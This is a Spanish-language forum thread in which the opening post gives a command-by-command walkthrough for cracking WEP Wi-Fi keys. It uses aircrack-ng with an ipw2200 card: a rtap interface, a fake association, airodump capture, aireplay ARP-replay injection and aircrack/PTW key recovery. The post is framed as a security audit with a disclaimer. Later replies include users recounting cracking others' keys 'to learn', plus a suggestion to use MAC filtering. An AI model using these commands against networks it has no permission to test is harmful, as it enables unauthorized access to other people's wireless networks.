Debe estar conectado para participar
Buscar en los foros:


 






Uso de Comodín:
*    coincide cualquier número de caracteres
%    coincide exactamente un caracter

..::[Auditoria de seguridad]::.. Router casero y suite aircrack con modulo ipw2200

No hay Etiquetas
Entrada
Midle End Level

artzneo

entradas: 170

17:26 28/03/2008

1

La intencion no es que vallan y abran las redes ajenas. no me hago responsable del mal uso que se le de. antes pedi permiso para poner esto y me comentaron que si se podia…
esto tambien esta en mi blog

Muchos me decían que tenia que parchar pero no hay necesidad bueno lo que se necesita es:
1)
el paquete de aircrack-ng-0.9.1.tar.gz
el live cd backtrack2 ( o el que quieran pero que el kernel sirva xD)
tu superhiperultracheverechido modulo (tengo una thinkpad R50e) ipw2200

bueno comenzamos muchos mousedependientes me preguntan como hacerlo aqui pongo como lo hago yo:

tengo entendido que solo se pueden usar los ataques con este metodo

2 (–interactive)
3 (–arpreplay)
4 (–chopchop)

2)primero haz un scan con

iwlist dispositivo scan

y apunta el mac del AP y el canal esto es importante

3) opcional compila e instala el aircrack siempre lo hago xD —-
descarga wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
descomprime tar -zxvf aircrack-ng-0.9.tar.gz
entra en el directorio cd aircrack-ng-0.9
compila e instala make
make install
—————————————————————-

4)ahora activamos la interfaz de rtap

quitamos el modulo de ipw2200
modprobe -r ipw2200

si ponemos
modinfo ipw2200
parm: rtap_iface:create the rtap interface (1 – create, default 0) (int)
podremos ver las opciones que tiene el modulo y de ahi podemos mirar rtap_iface

cargamos el modulo con esa opcion =)
modprobe ipw2200 rtap_iface=1

con esto activamos la interfaz rtap

5)ahora tenemos que hacer una asociación a el AP dar una clave falsa o fake esto se tiene que hacer antes de aireplay

iwconfig eth1 ap macdelap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed

6)levantamos las interfaces

ifconfig eth1 up
ifconfig rtap0 up

si en este paso ponemos iwconfig para ver la asociación , podremos verla en el dispositivo eth1…

7)ahora corremos airodump para capturar paquetes con la interfaz rtap0
airodump-ng –channel –bssid -w jijoju rtap0
en channel ponemos el canal del ap
el bssid del ap
-w le dice que cree un archivo llamado jijoju
rtap0 es la interfase a usar
despues nos dice que clientes hay conectados

8)ahora abrimos aireplay
aireplay-ng –arpreplay -x 1024 -b bssid ap -h tumac -i rtap0 eth1
–arpreplay es el ataque
-x es el numero de paquetes por segundo
-b bssid del ap
-h tumac adress
-i que capture de este dispositivo (s)

9)esperamos un rato yo me espero a las 100000 iv's

despues con aircrack, en este caso era de 64 bits asi que pongo el parametro , si es de 128 bits pon 128 en lugar de 64 =) si quieres una taque con PTW pon -z

aircrack -n 64 archivo.cap
aircrack -z archivo.cap (ataque ptw)

Extreme Level

Actuario

entradas: 1617

17:49 28/03/2008

2

De que recontracarajo estas hablando, lo podés traducir al castellano ??? estás enseñando a "snifiar" y conseguir claves ?

Hardcore Extreme Level

jack

a

entradas: 6358

19:37 28/03/2008

3

Muy bueno, algo vi en su momento cuando tuve la plaquita WIFI de la ASUS P5B Deluxe.
Aprendí a usar kismet y aircrack entre otras cosas.

. - . - .-

 

Cita Iniciado por MatiiBE
los negros juntan honor x frags.. como nosotros los gamers.. pero ellos lo hacen de verdad…
High End Level

Lukas B

Cordoba, Argentina

entradas: 930

20:20 28/03/2008

4

yo hace un año saque varias claves WEP (con el proposito de aprender sobre seguridad en wireless, nada de hacer daño) usando la distro backtrack (a pesar de que probe Troppix, Auditor, etc), la suite Aircrak capturando con Aircap e inyectando con Aireplay, tambien me sirvio mucho el Kismet para el tema de las direcciones MAC.

Moderador

DJ_Rufa

Argentina

entradas: 5191

21:14 28/03/2008

5

Se de que estas hablando (porque lo intente hacer con mi notebook) pero sinceramente, te falta un poco mas de radaccion, vas a los ponchos y no se entiende. Te lo digo como una ayuda. Si te molesta mi comentario, le pido a un moderador que lo borre y listo. En cuanto al resto, igual se agradece el intento (y digo intento, porque entre la guia que lei en ingles y esto, no entiendo nada, estoy en la misma, sorry). Saludos.

Midle End Level

GProgrammer

entradas: 258

23:11 28/03/2008

6

Gente prueben air snort para capturar trafico, y air crack ng para sacar las claves
Salu2.

Extreme Level

javier

entradas: 2369

17:55 30/03/2008

7

Gracias artzneo por tu aporte. por mi parte lo eh usado con ubuntu que con solo bajar los paquetes ya esta todo listo y es algo muy bueno para aprender sobre seguridad.

Actuario el articulo esta echo para fines de aprender sobre la seguridad de nuestra red o de la que hemos creado. Evitemos las malas intenciones sobre este metodo.

Javier… Para seguir la trayectoria: mira al maestro, sigue al maestro, camina junto con el maestro, mira a través del maestro, conviértete en el maestro.

Midle End Level

artzneo

entradas: 170

18:02 30/03/2008

8

exacto. algo para poder defenderse es usar filtrado de mac.